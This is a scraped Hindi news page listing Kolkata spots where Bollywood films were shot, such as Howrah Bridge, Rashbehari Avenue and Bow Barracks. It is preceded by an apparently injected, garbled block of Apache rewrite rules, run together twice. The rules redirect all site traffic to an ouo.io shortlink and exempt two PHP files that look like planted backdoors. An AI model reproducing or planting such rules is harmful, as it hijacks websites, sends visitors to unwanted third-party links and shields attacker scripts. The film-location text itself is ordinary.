
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 467
Previousकोलकाता अपनी अनोखी विरासत और संस्कृति के लिए जाना जाता है। यहां ऐसी कई मशहूर चीजें हैं, जो पूरे देश में मशहूर है। यहां के अनोखेपन को कई बॉलीवुड फिल्मों ने दिखाया है। यहां कई फिल्मों की शूटिंग की गई है। आइए, डालते हैं एक नजर—
हावड़ा ब्रिज: हावड़ा ब्रिज कोलकाता के प्रमुख पर्यटन आकर्षणों में से एक है, यहां अब तक कई सुपरहिट बॉलीवुड फिल्मों की शूटिंग हो चुकी हैं, जिनमे गुंडे, युवा, परिणीता जैसी फिल्में शामिल है।
रशबेहरी एवेन्यू: इम्तियाज अली की फिल्म ‘लव आजकल’ कोलकाता के कई हिस्सों में शूट हुई थी, जिनमें से प्रमुख थे हावड़ा ब्रिज, दक्षिण कोलकाता में रशबेहरी एवेन्यू, आदि, जहां फिल्म सीन्स को शूट किया गया था। आप यहां पर स्ट्रीट फूड का मजा ले सकते हैं। यहां पर ‘परी’ फिल्म के कई सीन फिल्माए गए हैं।
नार्थ कोलकाता: शूजित सरकार द्वारा निर्देशित फिल्म पीकू की शूतिंग भी यहीं हुई है। पिकू में एक्ट्रेस दीपिका पादुकोण, इरफान खान और अमिताभ बच्चन मुख भूमिका में नजर आये थे।
बो बैरक्स: बो बैरक्स मध्य कोलकाता में स्थित है, इस इलाके में आप मुख्य रूप से एंग्लो-भारतीय आबादी का एक छोटा केंद्र देख सकते है, जो यहां पीढ़ियों से रह रहे हैं। बॉलीवुड फिल्म निर्देशकों के बीच यह जगह खासा प्रसिद्ध है, इसी जगह फिल्म में डिटेक्टिव ब्योमकेश बक्शी (2015) की शूटिंग यहां हुई है।